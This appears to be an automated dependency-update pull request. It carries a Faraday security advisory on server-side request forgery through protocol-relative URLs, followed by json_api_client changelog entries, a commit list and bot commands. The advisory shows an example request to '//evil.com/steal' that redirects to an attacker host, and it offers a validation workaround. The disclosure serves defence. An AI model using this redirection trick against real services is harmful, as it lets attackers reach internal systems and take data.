🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Too many releases to show here. View the full release notes.

See the full diff on Github. The new version differs by more commits than we can show here.

1.23.0 (from changelog)

• #412
  • Add support for faraday 2.x
  • Drop support for Ruby < 3.0 (EOL)
  • Drop support for activesupport < 6.0 (EOL)
  • Remove deprecated faraday_middleware and add faraday-gzip (from #402)
• #400 - Fix for multi-word custom endpoint and route format

1.22.0 (from changelog)

• #403 - Feature: Use the association options to lookup relationship class
• #406 - Deep-merge nested additional_params

1.21.1

• #404 - Expose NotFound json errors
• #378 - Add the ability to create a subclass of JsonApiClient::Resource to have a modified id method

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 51 commits:

• version bump: v1.23.0
• Merge pull request #412 from Shopify/seb-faraday-2.x
• Update the changelog
• Drop unsupported Ruby versions
• Add support for Faraday 2.x
• Allow Faraday 2.x
• Change activesupport appraisals to >= 6.0
• Prefix activesupport appraisals
• Move appraisal to a development dependency
• Remove depredated faraday_middleware
• Merge pull request #400 from sebasjimenez10/sj/fix-multi-word-custom-endpoint
• Merge branch 'master' into sj/fix-multi-word-custom-endpoint
• version bump: v1.22.0
• Merge pull request #403 from sebasjimenez10/inspect-associations-for-computing-type
• Merge branch 'master' into inspect-associations-for-computing-type
• Merge pull request #411 from gaorlov/gaorlov/actions-ruby-setup-update
• updating Minitest namespace
• caching bunder
• uncaching bunder
• bumping checkout action
• adding explicit minitest dependency
• adding explicit minitest dependency
• fixing typo
• bumping ruby-setup action to be official version
• Merge branch 'master' into inspect-associations-for-computing-type
• Merge pull request #406 from tom-lord/deep_merge_additional_params
• Update CHANGELOG
• Use deep_merge on chained additional_params
• Test requirement to correctly handle merging nested additional_params
• Changelog update
• Use the associations to lookup relationship class
• Changelog update
• [FIX] Multi-word custom endpoint not respecting route format
• version bump: v1.21.1
• Merge pull request #404 from stokarenko/expose-not-found-json-errors
• Merge branch 'master' into expose-not-found-json-errors
• Merge pull request #378 from randyv12/master
• fix: remove extra newline
• fix: minitest for ruby < 2.4
• Merge branch 'JsonApiClient:master' into master
• Merge pull request #409 from JsonApiClient/actions-fix
• Update ruby.yml
• Update ruby.yml
• Update ruby.yml
• Merge pull request #408 from JsonApiClient/github-actions-integration
• Create ruby.yml
• fix: minitest
• task: test cleanup
• task: add to unreleased changelog pull 378
• Merge branch 'JsonApiClient:master' into master
• Expose NotFound json errors

Too many releases to show here. View the full release notes.

See the full diff on Github. The new version differs by more commits than we can show here.

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)